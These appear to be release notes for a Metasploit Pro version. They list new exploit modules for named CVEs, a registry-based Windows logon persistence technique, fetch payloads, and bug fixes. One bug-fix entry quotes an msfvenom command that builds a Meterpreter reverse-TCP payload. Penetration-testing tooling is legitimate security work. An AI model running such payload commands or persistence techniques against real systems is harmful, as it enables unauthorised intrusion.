Metasploit Pro Version 5.0.0-2026040201 Release Notes
Software release date: April 2, 2026 | Release notes published: April 3, 2026
New Module Content
- #20478 - Adds a new auxiliary module that exploits CVE-2026-23767, an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers. The vulnerability allows an attacker to send crafted commands over the network to inject custom ESC/POS print commands, which are used in various receipt printers.
- #20719 - Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection (CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX, updating affected modules accordingly.
- #20835 - Adds a module for CVE-2025-12548, an unauthenticated RCE in the Eclipse Che machine-exec service. The vulnerability allows attackers to connect over WebSocket on port 3333 and execute commands via JSON-RPC without authentication. This affects Red Hat OpenShift DevSpaces environments.
- #21023 - Adds a new exploits/multi/http/os_cmd_exec module that targets generic HTTP command execution vulnerabilities where user-supplied input is directly passed to system execution functions via an HTTP request.
- #21029 - Adds a new exploit module for CVE-2025-50286, an authenticated RCE vulnerability in Grav CMS 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x. The module exploits the Direct Install feature to upload a malicious plugin ZIP and execute an arbitrary PHP payload as the web server user.
- #21032 - Adds a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.
- #21033 - Adds an exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.
- #21069 - Adds an exploit module for CVE-2026-28289, an unauthenticated remote code execution vulnerability in FreeScout versions prior to or equal to 1.8.206.
- #21076 - Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder’s getImage.php endpoint.
- #21172 - Adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.
Enhancements and Features
- #20730 - Modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
- #20997 - Adds a new OptTimedelta datastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax.
- #20999 - Removes the legacy windows/local/persistence module, which has been superseded by the modernized windows/persistence/registry module. A moved_from alias ensures that existing scripts and workflows referencing the old module path are automatically redirected to the new one with a deprecation warning.
- #21048 - Updates the SOCKS proxy module to use the new fiber-based relay manager internally. The result is a reduction in code and improved performance.
- #21049 - Updates post modules to use an API that will expand multiple environment variables when set within the WritableDir option.
- #21090 - Updates multiple modules to make use of report_service().
- #21097 - Updates auxiliary/scanner/ftp/anonymous.rb to report the FTP service regardless of anonymous being enabled.
- #21214 - Adds additional validation to db_import before attempting to import values.
Bugs Fixed
- #20960 - Adds a DHCPINTERFACE option to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to.
- #20967 - Fixes an issue that prevents successful authentication relay from Ruby SMB Client and smbclient. These clients are now compatible with Msf::Exploit::Remote::SMB::RelayServer.
- #21004 - Fixes a bug in the #normalize_key method provided by the Windows Registry mixin. The result is correct behavior when using shell sessions to check for keys with trailing \ characters.
- #21024 - Fixes a bug in the JSON-RPC msfrpcd functionality that incorrectly required SSL certificates to be present even when disabled with msfrpcd -S.
- #21025 - Fixes a crash when calling the HTTP cookie jar with non-string values.
- #21028 - Fixes a crash when using the reload_all command when no module is present.
- #21073 - Fixes a bug where running exploit/multi/handler with a reverse HTTP/HTTPS payload multiple times on the same port caused cleanup issues.
- #21081 - Fixes a crash when using windows/exec with non-ASCII characters.
- #21138 - Fixes a bug that stopped the auxiliary/server/dhcp module from running as a background job when RHOSTS had been set.
- #21139 - Fixes a bug in the ldap_esc_vulnerable_cert_finder module that was preventing authentication from working when making a WinRM connection.
- #21148 - Fixes a bug where setting VERBOSE logging as false globally would still cause verbose logging to occur.
- #21169 - Fixes a bug that was preventing Mach-O binaries from being identified due to a Ruby string encoding compatibility problem.
- #21173 - Fixes a crash when attempting to generate a vbs payload with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=44 -f vbs.
- #21174 - Fixes a bug when parsing msfconsole’s -x flag when additional semicolons are present that are not meant to separate commands, i.e. msfconsole -x 'set option_name "a;b"'.
- #21199 - Fixes a crash in auxiliary/scanner/http/wp_perfect_survey_sqli when run against invalid or unreachable targets.
- #21207 - Fixes a warning when running the linux/gather/enum_protections module.
- #21208 - Fixes multiple warnings in modules that reported notes incorrectly.